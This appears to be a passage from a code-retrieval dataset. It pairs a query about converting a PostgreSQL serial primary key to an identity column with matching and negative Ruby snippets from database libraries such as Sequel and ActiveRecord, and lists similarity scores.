"def add_check(table_name, condition, options)\n name = options.fetch(:name) { raise 'add_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_column_name(name)}\n CHECK (#{condition})\n SQL\n end",
"def propertiesForConstraint\n\tend",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments[1].to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n if @foreign_keys[table_name].delete(\"#{$1}_type\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n elsif foreign_key_column =~ /(.*?)_type$/\n if @foreign_keys[table_name].delete(\"#{$1}_id\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n end\n end",
"def to_rules(table)\n table.rows.map do |row|\n row_data = table.column_names.zip(row).map do |column_name, value|\n case column_name\n when 'Id'\n ['id', value.to_i]\n when 'Pattern'\n ['pattern', value]\n when 'Tag Id'\n ['tag_id', value.nil? ? nil : value.to_i]\n when 'Tag Name'\n ['tag_name', value]\n else\n raise ArgumentError.new(\"Unknown Transaction column #{column_name}\")\n end\n end\n Hash[row_data]\n end\nend",
"def sqlite3_schema(table_name)\n table_schema = @dbm.sqlite3_pragma(table_name)\n\n # First, find the max lengths of each column's title strings\n # for nice print out in a fixed length of table format\n max_column_name_length = 0\n max_type_name_col_length = 22\n max_nullable_col_length = 10\n max_pk_col_length = 5\n\n table_schema.each {|schema|\n if max_column_name_length < schema[1].length\n max_column_name_length = schema[1].length\n end\n \n # Check null status and convert the stored binary value\n # into string \"YES\" or \"NO\"\n schema[3] = (schema[3] == 1 ? \"YES\":\"NO\")\n # Check primary key status and convert the stored\n # binary value into string \"YES\" or \"NO\"\n schema[5] = (schema[5] == 1 ? \"YES\":\"NO\")\n }\n\n # Print out the schema in a table format\n puts table_name\n printf \"%-5s | %-#{max_column_name_length}s | %-22s | %-5s | %-5s\\n\",\\\n \"CID\", \"NAME\", \"TYPE\", \"NULL?\", \"PK?\"\n dash_line_splitter = '-' * (50 + max_column_name_length)\n puts dash_line_splitter\n table_schema.each {|schema|\n printf \"%-5s | %-#{max_column_name_length}s | %-22s | %-5s | %-5s\\n\",\\\n schema[0].to_s, schema[1], schema[2], schema[3], schema[5]\n }\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments.all.first.to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_type\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = foreign_key_column\n elsif foreign_key_column =~ /(.*?)_type$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_id\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = \"#{Regexp.last_match(1)}_id\"\n end\n\n if foreign_id_column\n index_node = node.arguments.all.last.hash_value('index')\n if index_node.present? && (index_node.to_s != 'false')\n @index_columns[table_name] ||= []\n @index_columns[table_name] << foreign_id_column\n end\n end\n end",
"def hash\n [schema, name].hash\n end",
"def columns_hash?(connection, table_name)\n @columns_hash.key?(table_name)\n end",
"def is_constraint?(trigger_definition)\n !!(trigger_definition =~ /^CREATE CONSTRAINT TRIGGER/)\n end",
"def check_columns!\n if columns.nil? || columns.empty?\n raise Error, 'cannot literalize HashRow without columns'\n end\n end",
"def add_check_constraint(table, name, check)\n current_instructions << Instructions::AddCheckConstraint.new(\n table: table,\n name: name,\n check: check,\n )\n end",
"def columns_hash\n @columns_hash ||= columns.inject({}){|r,c| r.merge(c[:name].to_sym => c)}\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
"def columns_hash(connection, table_name)\n @columns_hash.fetch(table_name) do\n @columns_hash[deep_deduplicate(table_name)] = columns(connection, table_name).index_by(&:name).freeze\n end\n end",
"def all_constraints(table_filter=nil)\n constraints = tables.values.map(&:constraints).flatten\n constraints.delete_if{|c|!table_filter.include?(c.table.name)} if table_filter\n constraints\n end",
"def hash\n [type, hide_placeholders, base_justification, min_column_width, column_gap_rule, column_gap, row_gap_rule, row_gap, items].hash\n end",
"def foreign_key_constraint(from_table, from_column, options = {})\n to_table = options[:to_table] || from_column.to_s[/^(.+)_id$/, 1].tableize\n on_delete = case options[:on_delete]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n end\n on_update = case options[:on_update]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n when :restrict; 'restrict'\n end\n cmd = [ \"constraint #{constraint_name from_table, from_column}\",\n \"foreign key (#{from_column})\",\n \"references #{ActiveRecord::Base.connection.quote_table_name to_table}(id)\",\n ]\n cmd << \"on delete #{on_delete}\" if on_delete\n cmd << \"on update #{on_update}\" if on_update\n cmd.join(' ')\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def check_constraints\n case self.recordable\n when ExtractionsExtractionFormsProjectsSectionsQuestionRowColumnField\n case self.recordable.question_row_column_field.question_row_column.question_row_column_type.name\n when 'text'\n min_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_length).to_i\n max_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_length).to_i\n if self.persisted? && self.name.length > 0 && (self.name.length < min_length || self.name.length > max_length)\n errors.add(:length, \"must be between #{ min_length.to_s } and #{ max_length.to_s }\")\n end\n when 'numeric'\n # First check that we aren't trying to validate any of the ~, <, >, ≤, ≥ special characters.\n if self.recordable.question_row_column_field.question_row_column.question_row_column_fields.second == self.recordable.question_row_column_field\n unless (self.name =~ /\\A[-+]?[0-9]*\\.?[0-9]+\\z/) || self.name != ''\n errors.add(:value, 'Must be numeric')\n end\n\n min_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_value).to_i\n max_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_value).to_i\n if self.persisted? && (self.name.to_i < min_value || self.name.to_i > max_value)\n errors.add(:value, \"must be numeric and between #{ min_value.to_s } and #{ max_value.to_s }\")\n end\n end\n end\n end\n end",
"def contraints(p_module_object)\n\t\tconstraints = []\n\t\tmin = self.find_property('MIN')\n\t\tif ! min.nil?\n\t\t\tconstraints << ConstraintChecker::Constraints::Min.new(p_module_object, min.value)\n\t\tend\n\t\tmax = self.find_property('MAX')\n\t\tif !max.nil?\n\t\t\tconstraints << ConstraintChecker::Constraints::Max.new(p_module_object, max.value)\n\t\tend\n\t\tconstraints \n\n\tend",
"def create_table_request\n {\n table_name: self.table_name.to_s,\n attribute_definitions: self.attribute_definitions,\n key_schema: self.key_schema,\n provisioned_throughput: self.provisioned_throughput\n }\n end",
"def validate_forced_metadata(forced_metadata)\n # if custom metadata does not contain order(Array) or mapping(Hash),then it's not valid metadata\n unless (forced_metadata['order'].nil? || forced_metadata['mapping'].nil?)\n return if (forced_metadata['order'].class.eql?(Array) && forced_metadata['mapping'].class.eql?(Hash))\n end\n\n raise DTK::Client::DtkError,\"Provided table definition is not valid. Please review your order and mapping for provided definition: \\n #{forced_metadata.inspect}\"\n end",
"def bitfields column_name\n @@bitfields[column_name].keys\n end",
"def resource_schema\n schemated = {}\n resource.columns_hash.each { |key, value| schemated[key] = value.type }\n schemated\n end",
"def load_table_heading(conn, builder, table)\n primary_key_columns = []\n builder.heading{\n columns = conn.schema(table, {:reload => true})\n columns.each do |name, info|\n #puts info.inspect\n \n # find attribute definition\n defn = {:domain => dbtype_to_ruby_type(info),\n :mandatory => !info[:allow_null] }\n unless info[:ruby_default].nil?\n defn[:default] = info[:ruby_default]\n end\n \n # mark primary key columns\n if primary_key_columns and info[:primary_key]\n primary_key_columns << name \n end\n \n # build the attribute\n builder.attribute(name, defn)\n end\n }\n primary_key_columns\n end",
"def check_schema_migrations\n unless column_family_exists?('schema_migrations')\n say \"Creating schema_migrations column family\"\n connection.execute_cql_query(DatastaxRails::Cql::CreateColumnFamily.new('schema_migrations').key_type(:text).columns(:digest => :text, :solrconfig => :text, :stopwords => :text).to_cql)\n end\n \n check_key_name('schema_migrations')\n end",
"def cti_columns\n h = {}\n cti_models.each { |m| h[m.table_name] = m.cti_table_columns }\n h\n end",
"def supports_named_column_constraints?\n true\n end",
"def column_definitions(table_name) #:nodoc:\n pieces = table_name.split('.')\n \n if pieces.length == 1\n schema_name = 'public'\n table_name = pieces.last\n else\n schema_name, table_name = pieces.first, pieces.last\n end\n \n query <<-end_sql\n SELECT column_name, data_type, column_default, is_nullable\n FROM v_catalog.columns\n WHERE table_schema = '#{schema_name.gsub(/(^\"|\"$)/,'')}'\n AND table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n schema, _ = opts.fetch(:schema, schema_and_table(table))\n\n h = {}\n fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP \n reverse = opts[:reverse]\n\n (reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|\n if reverse\n key = [row[:schema], row[:table], row[:name]]\n else\n key = row[:name]\n end\n\n if r = h[key]\n r[:columns] << m.call(row[:column])\n r[:key] << m.call(row[:refcolumn])\n else\n entry = h[key] = {\n :name=>m.call(row[:name]),\n :columns=>[m.call(row[:column])],\n :key=>[m.call(row[:refcolumn])],\n :on_update=>fklod_map[row[:on_update]],\n :on_delete=>fklod_map[row[:on_delete]],\n :deferrable=>row[:deferrable],\n :table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),\n }\n\n unless schema\n # If not combining schema information into the :table entry\n # include it as a separate entry.\n entry[:schema] = m.call(row[:schema])\n end\n end\n end\n\n h.values\n end",
"def required_cols(model, used_attrs)\n required_cols = model.columns_hash.values.reject(&:null).map(&:name).map do |name|\n (foreign_key_to_association_mapping(model)[name] || name).to_s\n end\n (required_cols & used_attrs).sort\n end",
"def constraint_params\n params.require(:constraint).permit(:title, :decision_id)\n end",
"def constraint_name(table_name, relationship_name)\n \"#{table_name}_#{relationship_name}_fk\"\n end",
"def freeze\n @auto_validate_not_null_columns.freeze\n @auto_validate_explicit_not_null_columns.freeze\n @auto_validate_max_length_columns.freeze\n @auto_validate_unique_columns.freeze\n\n super\n end",
"def apply_hash_constraint( key, constraint )\n\t\taction = constraint[\"constraint\"]\n\n\t\trval = case action\n\t\t\twhen String\n\t\t\t\tself.apply_string_constraint( key, action )\n\t\t\twhen Regexp\n\t\t\t\tself.apply_regexp_constraint( key, action )\n\t\t\twhen Proc\n\t\t\t\tif args = constraint[\"params\"]\n\t\t\t\t\targs.collect! {|field| @form[field] }\n\t\t\t\t\tself.apply_proc_constraint( key, action, *args )\n\t\t\t\telse\n\t\t\t\t\tself.apply_proc_constraint( key, action )\n\t\t\t\tend\n\t\t\tend\n\n\t\t# If the validation failed, and there's a name for this constraint, replace\n\t\t# the name in @invalid_fields with the name\n\t\tif !rval && constraint[\"name\"]\n\t\t\t@invalid_fields[key] = constraint[\"name\"]\n\t\tend\n\n\t\treturn rval\n\tend",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def attributes_from_column_definition\n connection.columns(self.class.table_name, \"#{self.class.name} Columns\").inject({}) do |attributes, column| \n attributes[column.name] = column.default unless column.name == self.class.primary_key\n attributes\n end\n end",
"def to_hsh\n {name => {:columns => columns, :unqiue => unique}}\n end",
"def create_table_sql(name, generator, options)\n unless supports_named_column_constraints?\n # Split column constraints into table constraints if they have a name\n generator.columns.each do |c|\n if (constraint_name = c.delete(:foreign_key_constraint_name)) && (table = c.delete(:table))\n opts = {}\n opts[:name] = constraint_name\n [:key, :on_delete, :on_update, :deferrable].each{|k| opts[k] = c[k]}\n generator.foreign_key([c[:name]], table, opts)\n end\n if (constraint_name = c.delete(:unique_constraint_name)) && c.delete(:unique)\n generator.unique(c[:name], :name=>constraint_name)\n end\n if (constraint_name = c.delete(:primary_key_constraint_name)) && c.delete(:primary_key)\n generator.primary_key([c[:name]], :name=>constraint_name)\n end\n end\n end\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if pk = generator.constraints.find{|op| op[:type] == :primary_key}\n pk[:columns].each do |column|\n if matched_column = generator.columns.find{|gc| gc[:name] == column}\n matched_column[:null] = false\n end\n end\n end\n end\n\n \"#{create_table_prefix_sql(name, options)} (#{column_list_sql(generator)})\"\n end",
"def create_ast\n tables = sqlite3_all_tables\n if !tables.empty?\n tables.each {|table|\n tb_schema = sqlite3_pragma(table[1])\n column_info = Hash.new\n tb_schema.each {|schema|\n # schema:\n # 0 := CID (int), 1 := table name (str), 2 := type (str),\n # 3 := null? (int, 1: Null. 0: Not-null)\n # 5 := PK? (int, 1: PK. 0: Not-PK)\n column_info[schema[1]] = {:type => schema[2], :null? => schema[3], :pk? => schema[5]}\n }\n @table_ast[table[1]] = column_info\n }\n end\n return @table_ast\n end",
"def to_h!\n h = {}\n @schema.keys.each do |k|\n v = self[k]\n h[k] = Configuration.config?(v) ? v.to_h! : v.inspect\n end\n h\n end",
"def hash_fk_model\n foreign_keys = {}\n @model_class.reflect_on_all_associations(:belongs_to).map{ |r|\n foreign_keys[r.association_foreign_key.to_sym] = r.name\n }\n foreign_keys\n end",
"def writable_columns\n writable_attributes.keys\n end",
"def hash\n [check_id, exceptions, key, links, port, proof, protocol, since, status].hash\n end",
"def column_definition_unique_sql(sql, column)\n if column[:unique]\n if name = column[:unique_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << ' ' << unique_constraint_sql_fragment(column)\n constraint_deferrable_sql_append(sql, column[:unique_deferrable])\n end\n end",
"def _column_hashes\n @_column_hashes ||= {}\n end",
"def columns_hash\n @columns_hash ||= columns.inject({}) { |hash, column| hash[column.name] = column; hash }\n end"
] |
[
"0.69810116",
"0.69258285",
"0.6856217",
"0.67866033",
"0.6391585",
"0.62114024",
"0.6107531",
"0.6050771",
"0.6030892",
"0.5981253",
"0.5973716",
"0.591812",
"0.58696294",
"0.5748742",
"0.5745037",
"0.57010984",
"0.56576616",
"0.5642085",
"0.5629582",
"0.5566976",
"0.54869485",
"0.53686285",
"0.5330657",
"0.5316773",
"0.5300399",
"0.52783096",
"0.5221015",
"0.5215483",
"0.51311255",
"0.5119285",
"0.5119285",
"0.5119285",
"0.5098616",
"0.50970966",
"0.50745237",
"0.506494",
"0.5058977",
"0.50376594",
"0.5035219",
"0.5033428",
"0.50237113",
"0.5012528",
"0.5001577",
"0.5000636",
"0.49607277",
"0.4953475",
"0.49515483",
"0.49476013",
"0.49397784",
"0.49340558",
"0.49186653",
"0.49181342",
"0.49126768",
"0.4906491",
"0.4906435",
"0.4904822",
"0.49047476",
"0.48972046",
"0.48958373",
"0.48766655",
"0.4872862",
"0.4866733",
"0.48657078",
"0.4855562",
"0.4849001",
"0.48371488",
"0.48305807",
"0.4826238",
"0.48094365",
"0.48015577",
"0.47931963",
"0.47866577",
"0.47808814",
"0.47767743",
"0.47718567",
"0.4764292",
"0.4763012",
"0.47578618",
"0.47201383",
"0.4718352",
"0.47033137",
"0.47023448",
"0.47003573",
"0.4697774",
"0.46893054",
"0.46840307",
"0.46835884",
"0.46832615",
"0.46686152",
"0.46632165",
"0.46619216",
"0.46555597",
"0.4654707",
"0.46497637",
"0.46377704",
"0.4620948",
"0.46131125",
"0.46126926",
"0.46077788",
"0.46017665"
] |
0.7181034
|
0
|
Convert the first primary key column in the +table+ from being a serial column to being an identity column. If the column is already an identity column, assume it was already converted and make no changes. Only supported on PostgreSQL 10.2+, since on those versions Sequel will use identity columns instead of serial columns for auto incrementing primary keys. Only supported when running as a superuser, since regular users cannot modify system tables, and there is no way to keep an existing sequence when changing an existing column to be an identity column. This method can raise an exception in at least the following cases where it may otherwise succeed (there may be additional cases not listed here): The serial column was added after table creation using PostgreSQL <7.3 A regular index also exists on the column (such an index can probably be dropped as the primary key index should suffice) Options: :column :: Specify the column to convert instead of using the first primary key column :server :: Run the SQL on the given server
|
def convert_serial_to_identity(table, opts=OPTS)
raise Error, "convert_serial_to_identity is only supported on PostgreSQL 10.2+" unless server_version >= 100002
server = opts[:server]
server_hash = server ? {:server=>server} : OPTS
ds = dataset
ds = ds.server(server) if server
raise Error, "convert_serial_to_identity requires superuser permissions" unless ds.get{current_setting('is_superuser')} == 'on'
table_oid = regclass_oid(table)
im = input_identifier_meth
unless column = (opts[:column] || ((sch = schema(table).find{|_, sc| sc[:primary_key] && sc[:auto_increment]}) && sch[0]))
raise Error, "could not determine column to convert from serial to identity automatically"
end
column = im.call(column)
column_num = ds.from(:pg_attribute).
where(:attrelid=>table_oid, :attname=>column).
get(:attnum)
pg_class = Sequel.cast('pg_class', :regclass)
res = ds.from(:pg_depend).
where(:refclassid=>pg_class, :refobjid=>table_oid, :refobjsubid=>column_num, :classid=>pg_class, :objsubid=>0, :deptype=>%w'a i').
select_map([:objid, Sequel.as({:deptype=>'i'}, :v)])
case res.length
when 0
raise Error, "unable to find related sequence when converting serial to identity"
when 1
seq_oid, already_identity = res.first
else
raise Error, "more than one linked sequence found when converting serial to identity"
end
return if already_identity
transaction(server_hash) do
run("ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(column)} DROP DEFAULT", server_hash)
ds.from(:pg_depend).
where(:classid=>pg_class, :objid=>seq_oid, :objsubid=>0, :deptype=>'a').
update(:deptype=>'i')
ds.from(:pg_attribute).
where(:attrelid=>table_oid, :attname=>column).
update(:attidentity=>'d')
end
remove_cached_schema(table)
nil
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def reset_primary_key_sequence(table)\n return unless seq = primary_key_sequence(table)\n pk = SQL::Identifier.new(primary_key(table))\n db = self\n s, t = schema_and_table(table)\n table = Sequel.qualify(s, t) if s\n\n if server_version >= 100000\n seq_ds = metadata_dataset.from(:pg_sequence).where(:seqrelid=>regclass_oid(LiteralString.new(seq)))\n increment_by = :seqincrement\n min_value = :seqmin\n # :nocov:\n else\n seq_ds = metadata_dataset.from(LiteralString.new(seq))\n increment_by = :increment_by\n min_value = :min_value\n # :nocov:\n end\n\n get{setval(seq, db[table].select(coalesce(max(pk)+seq_ds.select(increment_by), seq_ds.select(min_value))), false)}\n end",
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n value = _select_pk_ds.where_single_value(Sequel[:pg_class][:oid] => regclass_oid(table, opts))\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key_to_uuid(table, options = {})\n default = options[:default] || 'gen_random_uuid()'\n seed = options[:seed]\n\n column = connection.primary_key(table)\n\n execute %Q{ALTER TABLE #{table}\n ALTER COLUMN #{column} DROP DEFAULT,\n ALTER COLUMN #{column} SET DATA TYPE UUID USING (#{to_uuid_pg(column, seed)}),\n ALTER COLUMN #{column} SET DEFAULT #{default}}\n\n execute %Q{DROP SEQUENCE IF EXISTS #{table}_#{column}_seq} rescue nil\n end",
"def primary_key(table)\n t = dataset.send(:input_identifier, table)\n @primary_keys.fetch(t) do\n pk = fetch(\"SELECT RDB$FIELD_NAME FROM RDB$INDEX_SEGMENTS NATURAL JOIN RDB$RELATION_CONSTRAINTS WHERE RDB$CONSTRAINT_TYPE = 'PRIMARY KEY' AND RDB$RELATION_NAME = ?\", t).single_value\n @primary_keys[t] = dataset.send(:output_identifier, pk.rstrip) if pk\n end\n end",
"def primary_key table\n return nil unless table\n table = self[table]\n pk = table.column_names.find{ |c| table[c].primary_key? }\n end",
"def primary_key(table_name, opts=OPTS)\n quoted_table = quote_schema_table(table_name)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n out_identifier, in_identifier = identifier_convertors(opts)\n schema, table = schema_or_current_and_table(table_name, opts)\n dataset = metadata_dataset.\n select(:kc__column_name).\n from(Sequel.as(:information_schema__key_column_usage, 'kc')).\n join(Sequel.as(:information_schema__table_constraints, 'tc'),\n [:table_name, :table_schema, :constraint_name]).\n where(:kc__table_name => in_identifier.call(table),\n :kc__table_schema => schema,\n :tc__constraint_type => 'PRIMARY KEY')\n value = dataset.map do |row|\n out_identifier.call(row.delete(:column_name))\n end\n value = case value.size\n when 0 then nil\n when 1 then value.first\n else value\n end\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key\n return @primary_key if @primary_key\n return 'id' if @id\n \n candidates = @columns.find_all { |col| col.unique }.map { |col| col.name }\n return 'id' if candidates.include? 'id'\n candidates.find { |c| c =~ eval(\"/^#{@name}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{singularize}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{pluralize}.*id$/i\") } ||\n candidates.first\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def serial_primary_key_options\n # :nocov:\n auto_increment_key = server_version >= 100002 ? :identity : :serial\n # :nocov:\n {:primary_key => true, auto_increment_key => true, :type=>Integer}\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def type_literal_generic_integer(column)\n column[:serial] ? :serial : super\n end",
"def type_literal_generic_integer(column)\n column[:serial] ? :serial : super\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk && sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n\n pk ||= default_pk\n sequence ||= default_sequence\n end\n\n if @logger && pk && !sequence\n @logger.warn \"#{table} has primary key #{pk} with no default sequence.\"\n end\n\n if pk && sequence\n quoted_sequence = quote_table_name(sequence)\n max_pk = query_value(\"SELECT MAX(#{quote_column_name pk}) FROM #{quote_table_name(table)}\", \"SCHEMA\")\n if max_pk.nil?\n if postgresql_version >= 100000\n minvalue = query_value(\"SELECT seqmin FROM pg_sequence WHERE seqrelid = #{quote(quoted_sequence)}::regclass\", \"SCHEMA\")\n else\n minvalue = query_value(\"SELECT min_value FROM #{quoted_sequence}\", \"SCHEMA\")\n end\n end\n if max_pk\n # NOTE(joey): This is done to replace the call:\n #\n # SELECT setval(..., max_pk, false)\n #\n # with\n #\n # SELECT setval(..., max_pk-1)\n #\n # These two statements are semantically equivilant, but\n # setval(string, int, bool) is not supported by CockroachDB.\n #\n # FIXME(joey): This is incorrect if the sequence is not 1\n # incremented. We would need to pull out the custom increment value.\n max_pk - 1\n end\n query_value(\"SELECT setval(#{quote(quoted_sequence)}, #{max_pk ? max_pk : minvalue})\", \"SCHEMA\")\n end\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => :integer, :auto_increment => true}\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => :integer, :auto_increment => true}\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => Integer, :auto_increment => true}\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => Integer, :auto_increment => true}\n end",
"def primary_key(table_name)\n # TODO: Change this to be a pure mongo lookup by digging into document definitions\n # TODO: Manage _id and id\n id_definition = Mongo::DocumentDefinition.fields_for(table_name).find { |_, field_definition| field_definition['primary_key'] }\n Array(id_definition).first # && id_definition.first || '_id'\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def primary_key\n select(&:primary_key?)\n end",
"def primary_key(name, type = :primary_key, **options)\n column(name, type, **options.merge(primary_key: true))\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def serial_primary_key_options\n {:primary_key => true, :serial => true, :type=>Integer}\n end",
"def import_columns( table )\n schema = db.schema( table.name )\n\n # Get info about primary key columns.\n\n primary_key_columns = schema.select{ |name, opts| opts[ :primary_key ] }\n\n multi_primary_key = ( primary_key_columns.count > 1 )\n\n # Import each column in sequence.\n\n for name, opts in schema\n\n # Import column type and options.\n\n type, opts = import_column_type_and_options( opts )\n\n # Deal with primary keys, which is a bit obscure because of the auto-increment handling.\n\n primary_key = opts.delete( :primary_key )\n auto_increment = opts.delete( :auto_increment )\n\n if primary_key && ! multi_primary_key\n if auto_increment\n opts.delete( :default ) if opts[ :default ].to_s =~ /\\Anextval/\n table.add_column( :primary_key, name, opts.merge( :type => type ) )\n next\n end\n opts[ :primary_key ] = primary_key\n end\n\n table.add_column( type, name, opts )\n end\n\n # Define multi-column primary key if necessary.\n # Note that Sequel currently doesn't preserve the primary key order, so neither can we.\n\n if multi_primary_key\n table.add_column( :primary_key, primary_key_columns.map{ |name, opts| name } )\n end\n end",
"def primary_key\n return @primary_key if @primary_key\n @primary_key = dimension_table.to_s.camelize.constantize.primary_key.to_sym\n rescue NameError => e\n ETL::Engine.logger.debug \"couldn't get primary_key from dimension model class, using default :id\"\n @primary_key = :id\n end",
"def force_primary_key(klass)\n # Automatically add an :oid serializable field if none is\n # defined and no other primary key is defined.\n if klass.primary_key == :oid and !klass.instance_attributes.include?(:oid)\n klass.attr_accessor :oid, Fixnum, :sql => primary_key_type\n end\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def primary_key\n fail NotImplementedError\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
